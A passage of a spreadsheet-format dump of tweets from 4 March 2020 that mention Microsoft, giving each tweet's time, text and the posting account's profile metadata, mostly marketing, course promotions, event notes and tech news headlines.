'https://pbs.twimg.com/profile_images/551289942/GKLogoRGB1440x1080_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/92847125/1421688610', 'profile_link_color': '4B88BE', 'profile_sidebar_border_color': '003366', 'profile_sidebar_fill_color': 'BAD8E9', 'profile_text_color': '003366', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 12:41:16 +0000 2020</t>
  </si>
  <si>
    <t>A 3-day course to get the #skills and #knowledge to develop, train and deploy #machinelearning solutions with #MicrosoftAzure services #cloud #Microsoft https://t.co/23dNwAgXmS https://t.co/lJa8mc1BIw</t>
  </si>
  <si>
    <t>{'id': 397349797, 'id_str': '397349797', 'name': 'Global Knowledge CEE', 'screen_name': 'GK_CEE', 'location': 'Worldwide', 'description': 'Worldwide leader in IT and business training, featuring Cisco, Microsoft, VMware, and project management.', 'url': 'http://t.co/I0on71A4us', 'entities': {'url': {'urls': [{'url': 'http://t.co/I0on71A4us', 'expanded_url': 'http://cee.globalknowledge.net', 'display_url': 'cee.globalknowledge.net', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 242, 'friends_count': 255, 'listed_count': 77, 'created_at': 'Mon Oct 24 15:32:53 +0000 2011', 'favourites_count': 9, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3640,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'http://pbs.twimg.com/profile_images/472391859692515328/pe6DCgxe_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/472391859692515328/pe6DCgxe_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/397349797/1381821553',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</si>
  <si>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Wed Mar 04 12:41:09 +0000 2020</t>
  </si>
  <si>
    <t>Wed Mar 04 12:40:05 +0000 2020</t>
  </si>
  <si>
    <t>What's new in intelli-CTi V4.2? 
We have modernised the look of our user interface to align with #Microsoft's updates to UCI and make it feel even more like an extension of #Dynamics365 
Hear about the other new features here  https://t.co/sepXYPrRwt
#CTI #Telephony https://t.co/0XShf9m6fJ</t>
  </si>
  <si>
    <t>{'id': 889429172396978176, 'id_str': '889429172396978176', 'name': 'intelli-CTi', 'screen_name': 'intelliCTi', 'location': 'Global', 'description': 'Integrating #CRM and #telephony systems for improved customer experience and user productivity ðŸ“ž #Dynamics365 #InforCRM #ISV', 'url': 'https://t.co/BavV9d8XOz', 'entities': {'url': {'urls': [{'url': 'https://t.co/BavV9d8XOz', 'expanded_url': 'https://www.intellicti.com', 'display_url': 'intellicti.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 209, 'friends_count': 549, 'listed_count': 2, 'created_at': 'Mon Jul 24 10:16:54 +0000 2017', 'favourites_count': 637, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 575,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'http://pbs.twimg.com/profile_images/889432856648450049/onkpePJj_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/889432856648450049/onkpePJj_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/889429172396978176/1581611420', 'profile_link_color': '005EB8',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</si>
  <si>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12:39:57 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Retiring Basic Authentication For Exchange Online https://t.co/0sJbifurw4 #blog #blogpost #newpost #microsoft #exchangeonline #office365 #office365tenant #basicauthentication #modernauthentication #basicauth #modernauth #msoffice #outlook #outlookapp #technology #tech</t>
  </si>
  <si>
    <t>{'id': 801591072258478080, 'id_str': '801591072258478080', 'name': 'David Lim', 'screen_name': 'dlim006ny', 'location': '', 'description': 'Senior Advisor, Digital Creator, EP &amp; Host of The David &amp; Ronald Show Podcast', 'url': 'https://t.co/XhzZVgxq3Q', 'entities': {'url': {'urls': [{'url': 'https://t.co/XhzZVgxq3Q', 'expanded_url': 'https://www.davidlimonline.com', 'display_url': 'davidlimonline.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 79, 'friends_count': 274, 'listed_count': 0, 'created_at': 'Thu Nov 24 00:59:39 +0000 2016', 'favourites_count': 17073, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3664, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1129908152089104384/R0y28e5Y_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1129908152089104384/R0y28e5Y_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/801591072258478080/1520114979',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</si>
  <si>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12:37:22 +0000 2020</t>
  </si>
  <si>
    <t>A 3-day course to get the #skills and #knowledge to develop, train and deploy #machinelearning solutions with #MicrosoftAzure services #cloud #Microsoft https://t.co/MDmYWT6c9s https://t.co/O8EeYzlPH6</t>
  </si>
  <si>
    <t>{'id': 39752358, 'id_str': '39752358', 'name': 'Global Knowledge UK', 'screen_name': 'GKUnitedKingdom', 'location': 'United Kingdom', 'description': 'Providing IT &amp; business skills learning to organisations across the UK, focusing on #Cisco, #Microsoft, #VMware, #IBM &amp; best practice including #ITIL &amp; #PRINCE2', 'url': 'https://t.co/w5rIuuTYW4', 'entities': {'url': {'urls': [{'url': 'https://t.co/w5rIuuTYW4', 'expanded_url': 'http://www.globalknowledge.com/en-gb/training/courses', 'display_url': 'globalknowledge.com/en-gb/trainingâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1998, 'friends_count': 1457, 'listed_count': 205, 'created_at': 'Wed May 13 13:43:43 +0000 2009', 'favourites_count': 516, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 10950,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'http://pbs.twimg.com/profile_images/210068642/GKLogoRGB1440x1080_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/210068642/GKLogoRGB1440x1080_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/39752358/1526384081', 'profile_link_color': '4B88BE', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'BAD8E9', 'profile_text_color': '003366', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 12:33:36 +0000 2020</t>
  </si>
  <si>
    <t>Had an amazing day at my first @DevOpsDaysNYC yesterday. Huge props to the organizers for a remarkable venue (that library! ), great discussions and friendly people.
Come see us at the #Microsoft booth and talk to @azureadvocates and @github experts on DevOps and more! https://t.co/DP6rr9YEAO</t>
  </si>
  <si>
    <t>{'id': 759720, 'id_str': '759720', 'name': 'Nitya Narasimhan', 'screen_name': 'nitya', 'location': 'NYC / Hudson Valley', 'description': 'PhD-Research-Development-Community / Opinions Mine / She-Her / Tech awareness to Actionable learning / Try-Fail-Learn / #DevRel @azureadvocates #FearlessDev', 'url': 'https://t.co/M77bWu0dKb', 'entities': {'url': {'urls': [{'url': 'https://t.co/M77bWu0dKb', 'expanded_url': 'http://nitya.dev', 'display_url': 'nitya.dev', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 6665, 'friends_count': 1218, 'listed_count': 431, 'created_at': 'Fri Feb 09 05:44:39 +0000 2007', 'favourites_count': 25102, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 27678,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'http://pbs.twimg.com/profile_images/1180571058669260801/DqTm0PDx_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1180571058669260801/DqTm0PDx_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/759720/1570305382', 'profile_link_color': 'E81C4F',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</si>
  <si>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Wed Mar 04 12:31:36 +0000 2020</t>
  </si>
  <si>
    <t>Make life easier for your teachers with these simple, time-saving #Windows10 shortcuts.      #EducationalTechnology #K12 #MicrosoftEducation #Microsoft https://t.co/5CfWAzCHoX</t>
  </si>
  <si>
    <t>{'id': 3411223227, 'id_str': '3411223227', 'name': 'Be BrainFriendly', 'screen_name': 'BFConnections', 'location': 'Huntington, NY', 'description': 'The key to successfully developing others is to apply brain-friendly coaching to support their ability to shift from being uncomfortable to getting comfortable.', 'url': 'http://t.co/jb0AXl8u4r', 'entities': {'url': {'urls': [{'url': 'http://t.co/jb0AXl8u4r', 'expanded_url': 'http://www.lauriecarey.com', 'display_url': 'lauriecarey.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 91, 'friends_count': 454, 'listed_count': 3, 'created_at': 'Sun Aug 09 21:56:22 +0000 2015', 'favourites_count': 39, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 329,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'http://pbs.twimg.com/profile_images/643487843185229824/OAu-ry7w_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/643487843185229824/OAu-ry7w_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3411223227/1442254464',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</si>
  <si>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12:30:56 +0000 2020</t>
  </si>
  <si>
    <t>Just a week and we can put our hands on the new #Xbox exclusive #Ori!!  Will you buy it??
#lotof #games #XboxOne #Microsoft https://t.co/TNy9UgveBh</t>
  </si>
  <si>
    <t>{'id': 1229090620544815104, 'id_str': '1229090620544815104', 'name': 'LotOfNerd', 'screen_name': 'LotOfNerd1', 'location': '', 'description': 'Daily news of lot of nerdy things as #videogames #tvseries #films', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 97, 'friends_count': 164, 'listed_count': 0, 'created_at': 'Sun Feb 16 17:11:15 +0000 2020', 'favourites_count': 428, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 150, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1233335756371963904/g6Tj4XVd_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1233335756371963904/g6Tj4XVd_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1229090620544815104/1582211620',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</si>
  <si>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12:30:02 +0000 2020</t>
  </si>
  <si>
    <t>YOTNM Ep. 2: March is Colorectal Cancer Awareness month  https://t.co/1dKEeH2h80 #microsoft #healthcare #MSFTAdvocate https://t.co/K9PY5EZuqw</t>
  </si>
  <si>
    <t>Wed Mar 04 12:23:00 +0000 2020</t>
  </si>
  <si>
    <t>Looking to move to #Microsoft #Dynamics365F&amp;amp;O and drive value? Heres a step-by-step #migration guide. https://t.co/Wp6IqIrAVh https://t.co/cvdIZVHpcF</t>
  </si>
  <si>
    <t>{'id': 820432429, 'id_str': '820432429', 'name': 'Synoptek', 'screen_name': 'Synoptek', 'location': 'Irvine, CA', 'description': 'Synoptek is a global systems integrator &amp; managed IT services provider, offering comprehensive IT management and consultancy services to organizations worldwide', 'url': 'https://t.co/rjA9aYX6tH', 'entities': {'url': {'urls': [{'url': 'https://t.co/rjA9aYX6tH', 'expanded_url': 'http://www.synoptek.com', 'display_url': 'synoptek.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1713, 'friends_count': 769, 'listed_count': 71, 'created_at': 'Wed Sep 12 22:06:36 +0000 2012', 'favourites_count': 349, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1890, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'FA4616', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1211110592934580224/NoZyg_wB_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1211110592934580224/NoZyg_wB_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/820432429/1542648813', 'profile_link_color': 'FC6845',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</si>
  <si>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12:20:08 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #PowerApps Masking First 'X' Characters of an input control
#Microsoft365 #PowerPlatform #SPDevWeekly 
https://t.co/XLoJFGvoeh</t>
  </si>
  <si>
    <t>{'id': 30611892, 'id_str': '30611892', 'name': 'Piyush K Singh', 'screen_name': 'DomainPiyush', 'location': 'India', 'description': 'Software developer and a SharePoint enthusiast. Love solving problems. #RainAndMusicPerson', 'url': 'https://t.co/ez9J3gFkhU', 'entities': {'url': {'urls': [{'url': 'https://t.co/ez9J3gFkhU', 'expanded_url': 'https://piyushksingh.com/', 'display_url': 'piyushksingh.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 167, 'friends_count': 567, 'listed_count': 13, 'created_at': 'Sun Apr 12 06:00:41 +0000 2009', 'favourites_count': 916, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 6466,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'http://pbs.twimg.com/profile_images/1168062314005663744/fUbVl1YR_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1168062314005663744/fUbVl1YR_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/30611892/1567322737', 'profile_link_color': '237580', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'A0C5C7', 'profile_text_color': '7C71A8', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 12:16:07 +0000 2020</t>
  </si>
  <si>
    <t>Big techs coronavirus responses are getting serious https://t.co/CozyIziuTH #Microsoft</t>
  </si>
  <si>
    <t>Wed Mar 04 12:15:09 +0000 2020</t>
  </si>
  <si>
    <t>Whats new in Microsoft Teams and SharePoint? This month we bring you new integrations, captions, tagging and increased sharing potential: https://t.co/ctYsNqpq58 #MicrosoftTeams #MicrosftSharePoint #Microsoft https://t.co/2gehQKNbFm</t>
  </si>
  <si>
    <t>{'id': 916229182153248768, 'id_str': '916229182153248768', 'name': 'ThinkShare', 'screen_name': 'ThinkShareUK', 'location': 'Stirling, Scotland', 'description': "At ThinkShare, we build solutions for clients who are looking to work more effectively, using #MicrosoftTeams #SharePoint &amp; #PowerBi. We're a Microsoft Partner.", 'url': 'https://t.co/X29m2zNI6O', 'entities': {'url': {'urls': [{'url': 'https://t.co/X29m2zNI6O', 'expanded_url': 'http://www.thinkshare.uk', 'display_url': 'thinkshare.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 12, 'friends_count': 44, 'listed_count': 0, 'created_at': 'Fri Oct 06 09:10:34 +0000 2017', 'favourites_count': 12, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 68, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1227536509911302144/eLY7ZqA0_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1227536509911302144/eLY7ZqA0_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/916229182153248768/1580905555',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</si>
  <si>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12:14:01 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft 365 &amp;amp; SharePoint PnP Weekly - Episode 73 #Microsoft  https://t.co/wwOKReVLyF</t>
  </si>
  <si>
    <t>Microsoft 365 &amp;amp; SharePoint PnP Weekly - Episode 72 #Microsoft  https://t.co/Y0gZ4w5uR9</t>
  </si>
  <si>
    <t>Wed Mar 04 12:13:25 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Project (beginner to advanced level)
#microsoft #project #course
https://t.co/8rUGjc8pex</t>
  </si>
  <si>
    <t>Wed Mar 04 12:12:52 +0000 2020</t>
  </si>
  <si>
    <t>We welcome @MicrosoftIndia as our Gold partner for "3rd Edition Future of Retail Summit &amp;amp; Awards 2020" happening on 6th March at Holiday Inn, New Delhi.
For more information download brochure: https://t.co/bGD9NneqAW
#futureretail #microsoft #UBSFFOR #UBSForums https://t.co/yhrtOsOfbG</t>
  </si>
  <si>
    <t>{'id': 992290287429959682, 'id_str': '992290287429959682', 'name': 'UBS Forums', 'screen_name': 'ubsforums', 'location': 'Mumbai, India', 'description': 'UBS Forums - Leading business media company providing research-based business conferences &amp; research reports for corporate professional learning.', 'url': 'https://t.co/lZIlluCbBO', 'entities': {'url': {'urls': [{'url': 'https://t.co/lZIlluCbBO', 'expanded_url': 'http://www.ubsforums.com', 'display_url': 'ubsforums.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 210, 'friends_count': 5, 'listed_count': 1, 'created_at': 'Fri May 04 06:30:15 +0000 2018', 'favourites_count': 101, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1471, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/997003103856558080/V-fBSTkI_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/997003103856558080/V-fBSTkI_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/992290287429959682/1550300480',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</si>
  <si>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12:12:45 +0000 2020</t>
  </si>
  <si>
    <t>#Google I/O Also Cancelled Due To #Coronavirus Outbreak https://t.co/JOzyTNHGFt #news #microsoft #technology</t>
  </si>
  <si>
    <t>{'id': 879630529011695618, 'id_str': '879630529011695618', 'name': 'Next Tech What', 'screen_name': 'NextTechWhat', 'location': 'Worldwide', 'description': 'Latest Tech News Tweets | #Startups #Tech #IoT #Automotive #HealthCare #Retail #Logistics #ArtificialIntelligence #BigData', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 223, 'friends_count': 140, 'listed_count': 7, 'created_at': 'Tue Jun 27 09:20:35 +0000 2017', 'favourites_count': 24, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 13622, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/881071189539471361/3C50ZYmt_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/881071189539471361/3C50ZYmt_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/879630529011695618/1498556276',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</si>
  <si>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12:12:02 +0000 2020</t>
  </si>
  <si>
    <t>On my way to Wien (AT) for the Azure Stack Partner Inner Circle. #azurestack #azurestackedge #azurestackhub #microsoft</t>
  </si>
  <si>
    <t>{'id': 413046774, 'id_str': '413046774', 'name': 'Twilfi', 'screen_name': 'AzureCris', 'location': 'in the Cloud', 'description': 'I am not interested in certification! #HybridCloud with #AzureStack. Founder #Azure Meetup Osnabrueck. https://t.co/Da2chwXIGe, #Volksbund', 'url': None, 'entities': {'description': {'urls': [{'url': 'https://t.co/Da2chwXIGe', 'expanded_url': 'http://AzureStack.info', 'display_url': 'AzureStack.info', 'indices': [103, 126]}]}}, 'protected': False, 'followers_count': 556, 'friends_count': 752, 'listed_count': 144, 'created_at': 'Tue Nov 15 12:30:04 +0000 2011', 'favourites_count': 1865, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6814,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'http://pbs.twimg.com/profile_images/1105384342044528641/cL66cmFm_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1105384342044528641/cL66cmFm_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/413046774/1540726997', 'profile_link_color': '1B95E0', 'profile_sidebar_border_color': 'BCB302', 'profile_sidebar_fill_color': '171106', 'profile_text_color': '8A7302', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 12:10:13 +0000 2020</t>
  </si>
  <si>
    <t>Find yourself spending more time managing your IT than focussing on your actual job? The US military had the same problem. 
Read how Microsoft worked with it to harnessing the power of the cloud: https://t.co/iG3PzWRxq6 
#Microsoft #CloudComputing https://t.co/AWiVw45RYW</t>
  </si>
  <si>
    <t>{'id': 248629266, 'id_str': '248629266', 'name': 'Fruition Systems', 'screen_name': 'FruitionSystems', 'location': 'Hampshire', 'description': 'Fruition Systems is a leading Microsoft cloud services consultancy. Experienced in #Dynamics365, #SharePoint &amp; #Azure. Managed IT services for businesses.', 'url': 'https://t.co/Mnt28sqOAD', 'entities': {'url': {'urls': [{'url': 'https://t.co/Mnt28sqOAD', 'expanded_url': 'http://www.fruitionsystems.co.uk', 'display_url': 'fruitionsystems.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 268, 'friends_count': 511, 'listed_count': 80, 'created_at': 'Mon Feb 07 11:58:32 +0000 2011', 'favourites_count': 64, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1612, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '7E1229', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1200539636667441158/kwsAMR1Q_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1200539636667441158/kwsAMR1Q_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/248629266/1575064992', 'profile_link_color': '7E1229', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'CFCFCF', 'profile_text_color': '333333', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 12:09:59 +0000 2020</t>
  </si>
  <si>
    <t>Waitress in Japan becomes self-taught developer in #Microsoft #PowerBI and #Azure to digitally transform her restaurant--now her applications are being adopted by others in the food service industry. Watch her incredible story. https://t.co/iZE3jnRsdO</t>
  </si>
  <si>
    <t>{'id': 1008716037846597633, 'id_str': '1008716037846597633', 'name': 'Velvot Nigeria Limited', 'screen_name': 'Velvotng', 'location': 'Lagos, Nigeria', 'description': 'VELVOT has transformed how organizations work, collaborate, engage, analyze and report to meet key business objectives. #YourDigitalStrategyPartner', 'url': 'https://t.co/YtBeznAg9e', 'entities': {'url': {'urls': [{'url': 'https://t.co/YtBeznAg9e', 'expanded_url': 'https://velvot.com', 'display_url': 'velvot.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4178, 'friends_count': 3536, 'listed_count': 4, 'created_at': 'Mon Jun 18 14:20:19 +0000 2018', 'favourites_count': 1230, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1165,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'http://pbs.twimg.com/profile_images/1072933527187021830/MCym6qR0_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1072933527187021830/MCym6qR0_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1008716037846597633/1558106389',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</si>
  <si>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12:09:53 +0000 2020</t>
  </si>
  <si>
    <t>#1 SharePoint Migration Tool With #Comparison_Chart @saketadotcom  - Download Free Trial Nowhttps://t.co/7owDv57aPD
#SharePoint #Migration_Tool #Migrate #Data_Migration #Site_Migration #SharePoint_Online_migration #Microsoft #Software #Free #Trial #Download</t>
  </si>
  <si>
    <t>Wed Mar 04 12:08:09 +0000 2020</t>
  </si>
  <si>
    <t>An internal #Microsoft study found that over 44 Million #Office and #Azure accounts had reused #passwords that already been leaked in past #data breaches - https://t.co/HGNgt7oMVu
#passwordsecurity #microsoftoffice365 #microsoftoffice #windows #databreach #cybersecurity #infosec</t>
  </si>
  <si>
    <t>{'id': 80859472, 'id_str': '80859472', 'name': 'SWK Technologies', 'screen_name': 'SWKTECH', 'location': 'East Hanover, NJ', 'description': 'SWK will move your business beyond technology. We look at your whole business for opportunities to improve your systems then apply our expertise, seamlessly.', 'url': 'http://t.co/mvsHVSXXTO', 'entities': {'url': {'urls': [{'url': 'http://t.co/mvsHVSXXTO', 'expanded_url': 'http://www.swktech.com', 'display_url': 'swktech.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3657, 'friends_count': 1282, 'listed_count': 151, 'created_at': 'Thu Oct 08 14:23:16 +0000 2009', 'favourites_count': 526, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 7142,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'http://pbs.twimg.com/profile_images/704326586812616704/QWMPbG7P_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/704326586812616704/QWMPbG7P_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/80859472/1489076013', 'profile_link_color': '42343F',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</si>
  <si>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12:02:06 +0000 2020</t>
  </si>
  <si>
    <t>Performance amendments to WPF (Windows Presentation Substructure), including a more expeditious startup time and amended performance for Bitmap effects. #Software #Microsoft
https://t.co/9nVMacgFOm https://t.co/pUqflzvtpW</t>
  </si>
  <si>
    <t>Wed Mar 04 12:01:30 +0000 2020</t>
  </si>
  <si>
    <t>We are seeking an Accounts Assistant to join a team on a temporary to permanent basis.
Apply today at https://t.co/mdwx5zh5bE or call the office on 01747 825568.
#GoOctopus #accounts #finance #administration #microsoft #ITskills #joinourteam #job #jobs https://t.co/HeilGnekvN</t>
  </si>
  <si>
    <t>{'id': 2338162340, 'id_str': '2338162340', 'name': 'Octopus Personnel', 'screen_name': 'OctopusPersonne', 'location': 'Dorset. Somerset. Wiltshire.', 'description': 'Finding the right people for the right jobs', 'url': 'https://t.co/ATQj3UlQyg', 'entities': {'url': {'urls': [{'url': 'https://t.co/ATQj3UlQyg', 'expanded_url': 'http://www.octopuspersonnel.co.uk', 'display_url': 'octopuspersonnel.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 714, 'friends_count': 1190, 'listed_count': 62, 'created_at': 'Tue Feb 11 10:44:08 +0000 2014', 'favourites_count': 325, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4729,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'http://pbs.twimg.com/profile_images/992001021474955264/AEDEdrVX_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/992001021474955264/AEDEdrVX_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2338162340/1582894395', 'profile_link_color': '1BC2E0',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</si>
  <si>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12:01:10 +0000 2020</t>
  </si>
  <si>
    <t>Smart and Powerful. Atlas is the force that will carry your digital workspace.
Find out more: https://t.co/F4Ks6TICL6 https://t.co/F4Ks6TICL6
#Intranet #Microsoft #Office365  #atlas365 #digitalworkspace</t>
  </si>
  <si>
    <t>Wed Mar 04 12:01:08 +0000 2020</t>
  </si>
  <si>
    <t>Thank you for those who attended last night #sydneydynamics365ug at #microsoft reactor!
Big thanks and congratulations to this year committee for arranging and growing the communities to Newcastle and soon Parramatta!
As promised...https://t.co/NRl7Ub3fYV https://t.co/VrnTRoC9Fu</t>
  </si>
  <si>
    <t>{'id': 20299014, 'id_str': '20299014', 'name': 'Aylwin Wijaya', 'screen_name': 'aylwin_wong', 'location': 'Sydney', 'description': 'Software developer, technology enthusiast, and big fans of broccoli.', 'url': 'http://t.co/tsj9dFAG4d', 'entities': {'url': {'urls': [{'url': 'http://t.co/tsj9dFAG4d', 'expanded_url': 'http://lnkdin.me/p/aylwinwong', 'display_url': 'lnkdin.me/p/aylwinwong', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 148, 'friends_count': 358, 'listed_count': 6, 'created_at': 'Sat Feb 07 08:03:34 +0000 2009', 'favourites_count': 96, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 433,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'http://pbs.twimg.com/profile_images/443887060101763072/3SiUhL0h_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/443887060101763072/3SiUhL0h_normal.png',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</si>
  <si>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12:00:48 +0000 2020</t>
  </si>
  <si>
    <t>#Cisco will meld its recently released #Intelligent #Edgesoftware with #Microsofts #Azure #IoT Hub to make #transferring #data from #edge #devices to applications in the #Azure #cloud simpler...
https://t.co/oRf03zLRLF https://t.co/4HH6ySzkka</t>
  </si>
  <si>
    <t>Wed Mar 04 12:00:42 +0000 2020</t>
  </si>
  <si>
    <t>Risk Management &amp;amp; Azure Sentinal - check out Microsoft's 6 key announcements from #RSAC - one of the world's largest security conferences
#Security #Microsoft #CIO https://t.co/3ocycdG5CP</t>
  </si>
  <si>
